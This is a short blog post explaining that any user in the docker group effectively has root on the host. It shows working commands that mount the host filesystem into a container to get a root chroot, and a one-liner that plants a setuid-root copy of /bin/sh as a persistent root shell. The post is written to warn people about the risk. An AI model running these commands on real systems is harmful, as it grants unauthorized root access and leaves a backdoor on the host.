Home Posts About

Docker group security

Most Docker quick start guides give you a trick on how to use it without typing sudo every time.

Is it handy? Sure. Is it safe? …

$ sudo gpasswd -a $USER docker

What happened when you typed that in your terminal?
Well, as expected, it added the current user to the docker group.

Docker is ready for that change: it allows any user in that group (along with the root user) to use all the available docker commands.

The only issue is that you always have root privileges while using containers, which means that if you could link the host machine to the container, you could actually have unlimited root access.

What’s the matter? Docker actually provides a way to link the host and the container, volumes.

So… Do you want root access on your computer, without having to sudo?

$ docker run -ti -v /:/host debian chroot /host

Do you want a root shell, that you could use anytime?

$ docker run -v /:/host -t debian /bin/sh -c 'cp /bin/sh /host/bin/power-sh && chown root.root /host/bin/power-sh && chmod a+s /host/bin/power-sh'
$ power-sh
$ whoami

I hope you don’t need any other examples ~

TLDR? Anyone in the docker group has actually unlimited and unrestricted root access.

But you should not be afraid ; it’s not a bug but a feature.